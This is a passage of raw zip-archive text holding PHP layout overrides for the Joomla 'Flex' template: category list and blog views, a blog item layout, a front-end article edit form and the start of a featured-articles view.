			$headerTitle    = 'headers="categorylist_header_title"';
			$headerDate     = 'headers="categorylist_header_date"';
			$headerAuthor   = 'headers="categorylist_header_author"';
			$headerHits     = 'headers="categorylist_header_hits"';
			$headerEdit     = 'headers="categorylist_header_edit"';
			?>
		<thead>
			<tr>
				<th id="categorylist_header_title">
					<?php echo JHtml::_('grid.sort', 'JGLOBAL_TITLE', 'a.title', $listDirn, $listOrder); ?>
				</th>
				<?php if ($date = $this->params->get('list_show_date')) : ?>
					<th id="categorylist_header_date">
						<?php if ($date == "created") : ?>
							<?php echo JHtml::_('grid.sort', 'COM_CONTENT_' . $date . '_DATE', 'a.created', $listDirn, $listOrder); ?>
						<?php elseif ($date == "modified") : ?>
							<?php echo JHtml::_('grid.sort', 'COM_CONTENT_' . $date . '_DATE', 'a.modified', $listDirn, $listOrder); ?>
						<?php elseif ($date == "published") : ?>
							<?php echo JHtml::_('grid.sort', 'COM_CONTENT_' . $date . '_DATE', 'a.publish_up', $listDirn, $listOrder); ?>
						<?php endif; ?>
					</th>
				<?php endif; ?>
				<?php if ($this->params->get('list_show_author')) : ?>
					<th id="categorylist_header_author">
						<?php echo JHtml::_('grid.sort', 'JAUTHOR', 'author', $listDirn, $listOrder); ?>
					</th>
				<?php endif; ?>
				<?php if ($this->params->get('list_show_hits')) : ?>
					<th id="categorylist_header_hits">
						<?php echo JHtml::_('grid.sort', 'JGLOBAL_HITS', 'a.hits', $listDirn, $listOrder); ?>
					</th>
				<?php endif; ?>
				<?php if ($isEditable) : ?>
					<th id="categorylist_header_edit"><?php echo JText::_('COM_CONTENT_EDIT_ITEM'); ?></th>
				<?php endif; ?>
			</tr>
		</thead>
		<?php endif; ?>
		<tbody>
			<?php foreach ($this->items as $i => $article) : ?>
				<?php if ($this->items[$i]->state == 0) : ?>
				 <tr class="system-unpublished cat-list-row<?php echo $i % 2; ?>">
				<?php else: ?>
				<tr class="cat-list-row<?php echo $i % 2; ?>" >
				<?php endif; ?>
					<td <?php echo $headerTitle; ?> class="list-title">
						<?php if (in_array($article->access, $this->user->getAuthorisedViewLevels())) : ?>
							<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language)); ?>">
								<?php echo $this->escape($article->title); ?>
							</a>
						<?php else: ?>
							<?php
							echo $this->escape($article->title) . ' : ';
							$menu		= JFactory::getApplication()->getMenu();
							$active		= $menu->getActive();
							$itemId		= $active->id;
							$link = JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId);
							$returnURL = JRoute::_(ContentHelperRoute::getArticleRoute($article->slug, $article->catid, $article->language));
							$fullURL = new JUri($link);
							$fullURL->setVar('return', base64_encode($returnURL));
							?>
							<a href="<?php echo $fullURL; ?>" class="register">
								<?php echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE'); ?>
							</a>
						<?php endif; ?>
						<?php if ($article->state == 0) : ?>
							<span class="list-published label label-warning">
								<?php echo JText::_('JUNPUBLISHED'); ?>
							</span>
						<?php endif; ?>
						<?php if (strtotime($article->publish_up) > strtotime(JFactory::getDate())) : ?>
							<span class="list-published label label-warning">
								<?php echo JText::_('JNOTPUBLISHEDYET'); ?>
							</span>
						<?php endif; ?>
						<?php if ((strtotime($article->publish_down) < strtotime(JFactory::getDate())) && $article->publish_down != JFactory::getDbo()->getNullDate()) : ?>
							<span class="list-published label label-warning">
								<?php echo JText::_('JEXPIRED'); ?>
							</span>
						<?php endif; ?>
					</td>
					<?php if ($this->params->get('list_show_date')) : ?>
						<td <?php echo $headerDate; ?> class="list-date small">
							<?php
							echo JHtml::_(
								'date', $article->displayDate,
								$this->escape($this->params->get('date_format', JText::_('DATE_FORMAT_LC3')))
							); ?>
						</td>
					<?php endif; ?>
					<?php if ($this->params->get('list_show_author', 1)) : ?>
						<td <?php echo $headerAuthor; ?> class="list-author">
							<?php if (!empty($article->author) || !empty($article->created_by_alias)) : ?>
								<?php $author = $article->author ?>
								<?php $author = ($article->created_by_alias ? $article->created_by_alias : $author);?>
								<?php if (!empty($article->contact_link) && $this->params->get('link_author') == true) : ?>
									<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', JHtml::_('link', $article->contact_link, $author)); ?>
								<?php else: ?>
									<?php echo JText::sprintf('COM_CONTENT_WRITTEN_BY', $author); ?>
								<?php endif; ?>
							<?php endif; ?>
						</td>
					<?php endif; ?>
					<?php if ($this->params->get('list_show_hits', 1)) : ?>
						<td <?php echo $headerHits; ?> class="list-hits">
							<span class="badge badge-info">
								<?php echo JText::sprintf('JGLOBAL_HITS_COUNT', $article->hits); ?>
							</span>
						</td>
					<?php endif; ?>
					<?php if ($isEditable) : ?>
						<td <?php echo $headerEdit; ?> class="list-edit">
							<?php if ($article->params->get('access-edit')) : ?>
								<?php echo JHtml::_('icon.edit', $article, $params); ?>
							<?php endif; ?>
						</td>
					<?php endif; ?>
				</tr>
			<?php endforeach; ?>
		</tbody>
	</table>
<?php endif; ?>

<?php // Code to add a link to submit an article. ?>
<?php if ($this->category->getParams()->get('access-create')) : ?>
	<?php echo JHtml::_('icon.create', $this->category, $this->category->params); ?>
<?php  endif; ?>

<?php // Add pagination links ?>
<?php if (!empty($this->items)) : ?>
	<?php if ($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2 && $this->pagination->pagesTotal > 1)) : ?>
        <div class="pagination">
    
            <?php if ($this->params->def('show_pagination_results', 1)) : ?>
                <p class="counter pull-right">
                    <?php echo $this->pagination->getPagesCounter(); ?>
                </p>
            <?php  endif; ?>
            <?php echo $this->pagination->getPagesLinks(); ?>
        </div>
    <?php endif; ?>
</form>
<?php  endif; ?>
PK!Tv����-flex/html/com_content/category/blog_links.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;
?>
<ol class="clearfix">
<?php foreach ($this->link_items as &$item) : ?>
	<li>
    	<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)); ?>"><?php echo $item->title; ?></a>
	</li>
<?php endforeach; ?>
</ol>PK!�TܺK&K&'flex/html/com_content/category/blog.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

$doc = JFactory::getDocument(); 
$config = \JFactory::getConfig();
$sitename = $config->get('sitename');

/* Load template's parameters */
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;

//opengraph
$doc->addCustomTag('<meta property="og:url" content="'. \JURI::current() . '" />');
$doc->addCustomTag('<meta property="og:site_name" content="'. htmlspecialchars($sitename) .'" />');
$doc->addCustomTag('<meta property="og:type" content="blog" />');
if (isset($this->category->title)) {
$doc->addCustomTag('<meta property="og:title" content="'. $this->category->title .'" />');
}
/*
if (isset($this->category->description) && $this->category->description) {
$doc->addCustomTag('<meta property="og:description" content="'. \JHtml::_('string.truncate', (strip_tags(JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'))), 150) .'" />');
}
*/
if (!empty($this->category->getParams()->get('image'))) {
	$doc->addCustomTag('<meta property="og:image" content="'. \JURI::root().ltrim($this->category->getParams()->get('image'), '/') .'" />');
	$doc->addCustomTag('<meta property="og:image:width" content="900" />');
	$doc->addCustomTag('<meta property="og:image:height" content="600" />');
}
// Twitter
$doc->addCustomTag('<meta name="twitter:card" content="summary" />');
$doc->addCustomTag('<meta name="twitter:site" content="'. htmlspecialchars($sitename) .'" />');
$doc->addCustomTag('<meta name="twitter:title" content="'. $this->category->title .'" />');
/*
if (isset($this->category->description) && $this->category->description) {
$doc->addCustomTag('<meta name="twitter:description" content="'. \JHtml::_('string.truncate', (strip_tags(JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'))), 150) .'" />');
}
*/
if (!empty($this->category->getParams()->get('image'))) {
    $doc->addCustomTag('<meta name="twitter:image:src" content="'. \JURI::root().ltrim($this->category->getParams()->get('image'), '/') .'" />');
}

$masonry_item_spacing = $tpl_params->get('blog_item_spacing', 0);

if ($masonry_item_spacing == 0) {
	$masonry_item_padding = 'padding:30px 0 0;';
	$blog_hr = 'hr.blog_hr {margin-bottom:0}';
} else {
	$masonry_item_padding = 'padding:'. $masonry_item_spacing . 'px;';
	$blog_hr = '';
}
$tpl_params->get('blog_item_bg') != '' ? $blog_item_bg = 'background-color:' . $tpl_params->get('blog_item_bg') . ';' : $blog_item_bg = '';

if ($tpl_params->get('blog_layout') == 'masonry') :
// Add styles for Masonry
$post_style = '.masonry_item .item .post_intro {'
		. $masonry_item_padding
		. $blog_item_bg
		. '}'
		. $blog_hr
		. '.masonry_item {margin:0 0 30px 0;}'
        . '.masonry_item .item > div {margin-bottom:0;}';
$doc->addStyleDeclaration($post_style);
endif;

?>
<div class="blog<?php echo $this->pageclass_sfx; ?>" itemscope itemtype="http://schema.org/Blog">
	<?php if ($this->params->get('show_page_heading', 1)) : ?>
		<div class="page-header">
			<h1> <?php echo $this->escape($this->params->get('page_heading')); ?> </h1>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('show_category_title', 1) or $this->params->get('page_subheading')) : ?>
		<h2><?php echo $this->escape($this->params->get('page_subheading')); ?>
			<?php if ($this->params->get('show_category_title')) : ?>
				<span class="subheading-category"><?php echo $this->category->title; ?></span>
			<?php endif; ?>
		</h2>
	<?php endif; ?>

	<?php if ($this->params->get('show_cat_tags', 1) && !empty($this->category->tags->itemTags)) : ?>
		<?php $this->category->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
		<?php echo $this->category->tagLayout->render($this->category->tags->itemTags); ?>
	<?php endif; ?>

	<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
		<div class="category-desc clearfix">
			<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
				<img src="<?php echo $this->category->getParams()->get('image'); ?>" alt="<?php echo htmlspecialchars($this->category->getParams()->get('image_alt')); ?>"/>
			<?php endif; ?>
			<?php if ($this->params->get('show_description') && $this->category->description) : ?>
				<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
			<?php endif; ?>
		</div>
	<?php endif; ?>

	<?php if (empty($this->lead_items) && empty($this->link_items) && empty($this->intro_items)) : ?>
		<?php if ($this->params->get('show_no_articles', 1)) : ?>
			<p><?php echo JText::_('COM_CONTENT_NO_ARTICLES'); ?></p>
		<?php endif; ?>
	<?php endif; ?>

	<?php $leadingcount = 0; ?>
	<?php if (!empty($this->lead_items)) : ?>
		<div class="items-leading clearfix">
			<?php foreach ($this->lead_items as &$item) : ?>
				<article class="item leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?><?php echo $item->featured ? ' item-featured' : ''; ?>"
					itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
					<?php
					$this->item = & $item;
					echo $this->loadTemplate('item');
					?>
				</article>&nbsp;
				<?php $leadingcount++; ?>
			<?php endforeach; ?>
		</div><!-- end items-leading -->
	<?php endif; ?>

	<?php
	$introcount = (count($this->intro_items));
	$counter = 0;
	$columns = round((12 / $this->columns));
	
	if ($this->columns > 1) {
		$xs_columns = 'col-xs-12 ';
		$sm_columns = 'col-sm-6 ';
	} else {
		$xs_columns = 'col-xs-12 ';
		$sm_columns = 'col-sm-12 ';
	}
	?>
	<?php if ($tpl_params->get('blog_layout') == 'masonry') : ?>    
        <?php if (!empty($this->intro_items)) : ?>
            <?php $i = 1; ?>
                <div class="items-row items-masonry row clearfix">
            <?php foreach ($this->intro_items as $key => &$item) : ?>
                <?php $item->itemno = $i; ?>
                <?php $i = ($i == 7) ? 1 : $i ; ?>
                <?php $rowcount = ((int) $key % (int) $this->columns) + 1; ?>
                    <div class="<?php echo $xs_columns . $sm_columns; ?>col-md-<?php echo round((12 / $this->columns)); ?> masonry_item">
                        <article class="item column-<?php echo $rowcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?><?php echo $item->featured ? ' item-featured' : ''; ?>"
                            itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
                            <?php
                            $this->item = & $item;
                            echo $this->loadTemplate('item');
                            ?>
                        </article>
                        <!-- end item -->
                        <?php $counter++; ?>
                    </div><!-- end col-sm-* -->
                <?php $i++; ?>
            <?php endforeach; ?>
                </div><!-- end row -->
        <?php endif; ?>
   
    <?php else : ?>
    
    	<?php if (!empty($this->intro_items)) : ?>
			<?php foreach ($this->intro_items as $key => &$item) : ?>
                <?php $rowcount = ((int) $key % (int) $this->columns) + 1; ?>
                <?php if ($rowcount == 1) : ?>
                    <?php $row = $counter / $this->columns; ?>
                    <div class="items-row <?php echo 'row-' . $row; ?> row clearfix">
                <?php endif; ?>
                <div class="col-sm-<?php echo round((12 / $this->columns)); ?>">
                    <article class="item column-<?php echo $rowcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?><?php echo $item->featured ? ' item-featured' : ''; ?>"
                        itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
                        <?php
                        $this->item = & $item;
                        echo $this->loadTemplate('item');
                        ?>
                    </article>
                    <!-- end item -->
                    <?php $counter++; ?>
                </div>
                <?php if (($rowcount == $this->columns) or ($counter == $introcount)) : ?>
                    </div><!-- end row -->
                <?php endif; ?>
            <?php endforeach; ?>
        <?php endif; ?>
    <?php endif; ?>

	<?php if (!empty($this->link_items)) : ?>
		<div class="items-more clearfix">
			<?php echo $this->loadTemplate('links'); ?>
		</div>
	<?php endif; ?>
	<?php if (!empty($this->children[$this->category->id]) && $this->maxLevel != 0) : ?>
		<div class="cat-children clearfix">
			<?php if ($this->params->get('show_category_heading_title_text', 1) == 1) : ?>
				<h3><?php echo JTEXT::_('JGLOBAL_SUBCATEGORIES'); ?></h3>
			<?php endif; ?>
			<?php echo $this->loadTemplate('children'); ?></div>
	<?php endif; ?>
	<?php if (($this->params->def('show_pagination', 1) == 1 || ($this->params->get('show_pagination') == 2)) && ($this->pagination->get('pages.total') > 1)) : ?>
		<div class="pagination-wrapper clearfix">
			<?php if ($this->params->def('show_pagination_results', 1)) : ?>
				<p class="counter"><?php echo $this->pagination->getPagesCounter(); ?></p>
			<?php endif; ?>
			<?php echo $this->pagination->getPagesLinks(); ?>
		</div>
	<?php endif;
	// Fixed Masonry load from overlapping "Links" (Flex 3.8.3) 
if ($tpl_params->get('blog_layout') == 'masonry') {
	$doc->addScriptDeclaration('jQuery(function($){$(".items-masonry").imagesLoaded(function(){$(".items-masonry").masonry({itemSelector:".masonry_item"})})});');
}
?>
</div>PK!��ź�,flex/html/com_content/category/blog_item.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

// Create a shortcut for params.
$params = $this->item->params;
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html');
$canEdit = $this->item->params->get('access-edit');
$info = $params->get('info_block_position', 0);

// Post Format
$post_attribs = new JRegistry(json_decode( $this->item->attribs ));
$post_format = $post_attribs->get('post_format', 'standard');
$has_post_format = $tpl_params->get('show_post_format');

// Check if associations are implemented. If they are, define the parameter.
$assocParam = (JLanguageAssociations::isEnabled() && $params->get('show_associations'));
// Group the params
$useDefList = ($params->get('show_title') || $params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_create_date') || $params->get('show_hits') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author') || $assocParam);
?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate())) : ?>
	<div class="system-unpublished">
<?php endif; ?>

<?php $show_icons = JLayoutHelper::render('joomla.content.post_formats.icons',  $post_format); ?>

<?php if ($tpl_params->get('blog_layout') == 'masonry') { ?>
<div class="<?php echo $tpl_params->get('show_post_format') ? ' has-post-format-masonry': ''; ?>">
	<?php if ($has_post_format) { ?>
    <span class="post-format-masonry"><?php echo $show_icons; ?></span>
    <?php } ?> 
</div>

<?php } ?>

<?php
	if($post_format=='standard') {
		echo JLayoutHelper::render('joomla.content.intro_image', $this->item);
	} else {
		echo JLayoutHelper::render('joomla.content.post_formats.post_' . $post_format, array('params' => $post_attribs, 'item' => $this->item));
	}
?>
<?php if ($tpl_params->get('blog_layout') == 'masonry') { ?>
<!-- START Post-intro --><div class="post_intro">
<div class="entry-header">
	<?php if ($useDefList && ($info == 0 || $info == 2)) : ?>	
        <?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $this->item); ?>
        <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
    <?php endif; ?>
</div>
<?php } else { ?>
<div class="entry-header<?php echo $tpl_params->get('show_post_format') ? ' has-post-format': ''; ?>">
	<?php if ($useDefList && ($info == 0 || $info == 2)) : ?>	
		<?php if ($has_post_format) { ?>
        <span class="post-format"><?php echo $show_icons; ?></span>
        <?php } ?> 
        <?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $this->item); ?>
        <?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
	<?php endif; ?>
</div>
<?php } ?>

<?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
	<div class="edit-article pull-right"><?php echo JLayoutHelper::render('joomla.content.icons', array('params' => $params, 'item' => $this->item, 'print' => false)); ?></div>
<?php endif; ?>

<?php if ($useDefList && ($info == 1 || $info == 2)) : ?>
<div class="entry-header<?php echo $tpl_params->get('show_post_format') ? ' has-post-format': ''; ?>">
	<?php if($has_post_format) { ?>
    <span class="post-format"><?php echo $show_icons; ?></span>
    <?php } ?> 
    <?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $this->item); ?>
	<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
</div>
<?php endif; ?>
<?php if (!$params->get('show_intro')) : ?>
	<?php echo $this->item->event->afterDisplayTitle; ?>
<?php endif; ?>
<?php echo $this->item->event->beforeDisplayContent; ?>	
<?php echo $this->item->introtext; ?>
<?php if ($params->get('show_readmore') && $this->item->readmore) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link1 = JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId);
		$returnURL = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
		$link = new JUri($link1);
		$link->setVar('return', base64_encode($returnURL));
	endif; ?>
    <div class="clearfix"></div>	
 
	<?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $this->item, 'params' => $params, 'link' => $link)); ?>
	<?php echo JLayoutHelper::render('joomla.content.social_share.entrylist_share', $this->item); //Social Share ?>
    
<?php endif; ?>

	<div class="clearfix"></div>	
	<?php if ($params->get('show_tags') && !empty($this->item->tags->itemTags)) : ?>	
        <?php echo JLayoutHelper::render('joomla.content.tags', $this->item->tags->itemTags); ?>
    <?php endif; ?>
    <?php if ($params->get('show_readmore') && $this->item->readmore) {  ?>
    <?php } else {   ?>
	   <?php echo JLayoutHelper::render('joomla.content.social_share.entrylist_share', $this->item); //Social Share ?>
	<?php } ?>
  	<div class="clearfix"></div>
	<?php if ($tpl_params->get('blog_layout') == 'masonry') { ?>
    	<?php if ($tpl_params->get('blog_item_spacing') == 0) { ?>
    	<hr class="blog_hr" />
        <?php } ?>
        </div><!-- END Post-intro -->
    <?php } else { ?>
		<hr />
	<?php } ?>
 
<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate())) : ?>
<?php endif; ?>

<?php echo $this->item->event->afterDisplayContent; ?>
PK!�9��&&#flex/html/com_content/form/edit.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('_JEXEC') or die;

//Load Helix
$helix3_path = JPATH_PLUGINS . '/system/helix3/core/helix3.php';

if (file_exists($helix3_path)) {
    require_once($helix3_path);
    $this->helix3 = helix3::getInstance();
} else {
    die('Please install and activate helix plugin');
}

JHtml::_('stylesheet', 'system/frontediting.css', array(), true);
JHtml::_('script', 'system/frontediting.js', false, true);
helix3::addCSS('templates/flex/css/frontend-edit.css');
helix3::addJS('templates/flex/js/frontend-edit.js');

JHtml::_('behavior.tabstate');
JHtml::_('behavior.keepalive');
JHtml::_('behavior.formvalidator');
JHtml::_('behavior.calendar');
JHtml::_('behavior.modal', 'a.modal_jform_contenthistory');
JHtml::_('formbehavior.chosen', '#jform_catid', null, array('disable_search_threshold' => 0));
JHtml::_('formbehavior.chosen', 'select');
$this->tab_name = 'com-content-form';
$this->ignore_fieldsets = array('image-intro', 'image-full', 'jmetadata', 'item_associations');

// Create shortcut to parameters.
$params = $this->state->get('params');
//$images = json_decode($this->item->images);
//$urls = json_decode($this->item->urls);

// This checks if the editor config options have ever been saved. If they haven't they will fall back to the original settings.
$editoroptions = isset($params->show_publishing_options);
if (!$editoroptions)
{
	$params->show_urls_images_frontend = '0';
}

JFactory::getDocument()->addScriptDeclaration("
	Joomla.submitbutton = function(task)
	{
		if (task == 'article.cancel' || document.formvalidator.isValid(document.getElementById('adminForm')))
		{
			" . $this->form->getField('articletext')->save() . "
			Joomla.submitform(task);
		}
	}
");
?>
<div class="edit item-page<?php echo $this->pageclass_sfx; ?>">
	<?php if ($params->get('show_page_heading', 1)) { ?>
	<div class="page-header">
		<h1>
			<?php echo $this->escape($params->get('page_heading')); ?>
		</h1>
	</div>
	<?php } ?>

	<form action="<?php echo JRoute::_('index.php?option=com_content&a_id=' . (int) $this->item->id); ?>" method="post" name="adminForm" id="adminForm" class="form-validate form-vertical com-content-adminForm">
		<div class="btn-toolbar">
			<button type="button" class="btn btn-success" onclick="Joomla.submitbutton('article.save')">
				<i class="fas fa-check"></i> <?php echo JText::_('JSAVE') ?>
			</button>
			<?php
				if ($params->get('save_history', 0)) {
					$contenthistory = str_replace( 'btn', 'btn btn-primary', $this->form->getInput('contenthistory') );
					echo ( str_replace('icon-archive', 'fas fa-archive', $contenthistory) );
				}
			?>
			<button type="button" class="btn btn-danger" onclick="Joomla.submitbutton('article.cancel')">
				<i class="fas fa-times"></i> <?php echo JText::_('JCANCEL') ?>
			</button>
		</div>

		<fieldset>
			<ul class="nav nav-tabs">
				<li class="active"><a href="#editor" data-toggle="tab"><?php echo JText::_('COM_CONTENT_ARTICLE_CONTENT') ?></a></li>
				<?php if ($params->get('show_urls_images_frontend') ) : ?>
				<li><a href="#images" data-toggle="tab"><?php echo JText::_('COM_CONTENT_IMAGES_AND_URLS') ?></a></li>
				<?php endif; ?>
				<li><a href="#sppostformats" data-toggle="tab"><?php echo JText::_('BLOG_OPTIONS') ?></a></li>
				<li><a href="#publishing" data-toggle="tab"><?php echo JText::_('COM_CONTENT_PUBLISHING') ?></a></li>
				<li><a href="#language" data-toggle="tab"><?php echo JText::_('JFIELD_LANGUAGE_LABEL') ?></a></li>
				<li><a href="#metadata" data-toggle="tab"><?php echo JText::_('COM_CONTENT_METADATA') ?></a></li>
			</ul>

			<div class="tab-content">
				<div class="tab-pane active" id="editor">
					<?php echo $this->form->renderField('title'); ?>

					<?php if (is_null($this->item->id)) : ?>
						<?php echo $this->form->renderField('alias'); ?>
					<?php endif; ?>

					<?php echo $this->form->getInput('articletext'); ?>
                    
                    <?php if ($this->captchaEnabled) : ?>
						<?php echo $this->form->renderField('captcha'); ?>
                    <?php endif; ?>

				</div>

				<?php if ($params->get('show_urls_images_frontend')): ?>
				<div class="tab-pane row-fluid" id="images">
                	<div class="col-md-6">
					<?php echo $this->form->renderField('image_intro', 'images'); ?>
					<?php echo $this->form->renderField('image_intro_alt', 'images'); ?>
					<?php echo $this->form->renderField('image_intro_caption', 'images'); ?>
					<?php echo $this->form->renderField('float_intro', 'images'); ?>
                    <hr />
					<?php echo $this->form->renderField('image_fulltext', 'images'); ?>
					<?php echo $this->form->renderField('image_fulltext_alt', 'images'); ?>
					<?php echo $this->form->renderField('image_fulltext_caption', 'images'); ?>
					<?php echo $this->form->renderField('float_fulltext', 'images'); ?>
                    </div>
                    <div class="col-md-6">
					<?php echo $this->form->renderField('urla', 'urls'); ?>
					<?php echo $this->form->renderField('urlatext', 'urls'); ?>
                    
					<div class="control-group">
						<div class="controls">
							<?php echo $this->form->getInput('targeta', 'urls'); ?>
						</div>
					</div>
                    <hr />
					<?php echo $this->form->renderField('urlb', 'urls'); ?>
					<?php echo $this->form->renderField('urlbtext', 'urls'); ?>
					<div class="control-group">
						<div class="controls">
							<?php echo $this->form->getInput('targetb', 'urls'); ?>
						</div>
					</div>
                    <hr />
					<?php echo $this->form->renderField('urlc', 'urls'); ?>
					<?php echo $this->form->renderField('urlctext', 'urls'); ?>
					<div class="control-group">
						<div class="controls">
							<?php echo $this->form->getInput('targetc', 'urls'); ?>
						</div>
					</div>
                    </div>

				</div>
			<?php endif; ?>

			<div class="tab-pane" id="sppostformats">
				<?php $attribs = json_decode($this->item->attribs); ?>
				<?php echo $this->form->renderField('spfeatured_image','attribs', (isset($attribs->spfeatured_image)? $attribs->spfeatured_image: '')); ?>
                <?php echo $this->form->renderField('spfeatured_image_alt','attribs', (isset($attribs->spfeatured_image_alt)? $attribs->spfeatured_image_alt: '')); ?>
				<?php echo $this->form->renderField('post_format','attribs', (isset($attribs->post_format)? $attribs->post_format: '')); ?>
				<?php echo $this->form->renderField('gallery','attribs', (isset($attribs->gallery)? $attribs->gallery: '')); ?>
				<?php echo $this->form->renderField('audio','attribs', (isset($attribs->audio)? $attribs->audio: '')); ?>
				<?php echo $this->form->renderField('video','attribs', (isset($attribs->video)? $attribs->video: '')); ?>
				<?php echo $this->form->renderField('link_title','attribs', (isset($attribs->link_title)? $attribs->link_title: '')); ?>
				<?php echo $this->form->renderField('link_url','attribs', (isset($attribs->link_url)? $attribs->link_url: '')); ?>
				<?php echo $this->form->renderField('quote_text','attribs',(isset($attribs->quote_text)? $attribs->quote_text: '')); ?>
				<?php echo $this->form->renderField('quote_author','attribs',(isset($attribs->quote_author)? $attribs->quote_author: '')); ?>
				<?php echo $this->form->renderField('post_status','attribs',(isset($attribs->post_status)? $attribs->post_status: '')); ?>
                <?php echo $this->form->renderField('custom_post','attribs',(isset($attribs->custom_post)? $attribs->custom_post: '')); ?>
			</div>

				<div class="tab-pane row-fluid" id="publishing">
               	 <div class="col-md-6">
					<?php echo $this->form->renderField('catid'); ?>
					<?php echo $this->form->renderField('tags'); ?>
					<?php if ($params->get('save_history', 0)) : ?>
						<?php echo $this->form->renderField('version_note'); ?>
					<?php endif; ?>
					<?php echo $this->form->renderField('created_by_alias'); ?>
                </div>
                <div class="col-md-6">
					<?php if ($this->item->params->get('access-change')) : ?>
						<?php echo $this->form->renderField('state'); ?>
						<?php echo $this->form->renderField('featured'); ?>
						<?php echo str_replace( 'icon-calendar', 'far fa-calendar-alt', $this->form->renderField('publish_up') ); ?>
						<?php echo str_replace( 'icon-calendar', 'far fa-calendar-alt', $this->form->renderField('publish_down') ); ?>
					<?php endif; ?>
					<?php echo $this->form->renderField('access'); ?>
					<?php if (is_null($this->item->id)):?>
						<div class="control-group">
							<div class="control-label">
							</div>
							<div class="controls">
								<?php echo JText::_('COM_CONTENT_ORDERING'); ?>
							</div>
						</div>
					<?php endif; ?>
                 </div>
				</div>
				<div class="tab-pane row-fluid" id="language">
                	<div class="col-md-6">
					<?php echo $this->form->renderField('language'); ?>
                    </div>
				</div>
				<div class="tab-pane" id="metadata">
					<?php echo $this->form->renderField('metadesc'); ?>
					<?php echo $this->form->renderField('metakey'); ?>

					<input type="hidden" name="task" value="" />
					<input type="hidden" name="return" value="<?php echo $this->return_page; ?>" />
					<?php if ($this->params->get('enable_category', 0) == 1) :?>
					<input type="hidden" name="jform[catid]" value="<?php echo $this->params->get('catid', 1); ?>" />
					<?php endif; ?>
				</div>
			</div>
			<?php echo JHtml::_('form.token'); ?>
		</fieldset>
	</form>
</div><div style="min-height:35px;" class="clearfix"></div>PK!E8�n*flex/html/com_content/featured/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.caption');

// If the page class is defined, add to class as suffix.
// It will be a separate class if the user starts it with a space
?>
<div class="blog-featured<?php echo $this->pageclass_sfx;?>" itemscope itemtype="http://schema.org/Blog">
<?php if ($this->params->get('show_page_heading') != 0) : ?>
<div class="page-header">
	<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
</div>
<?php endif; ?>

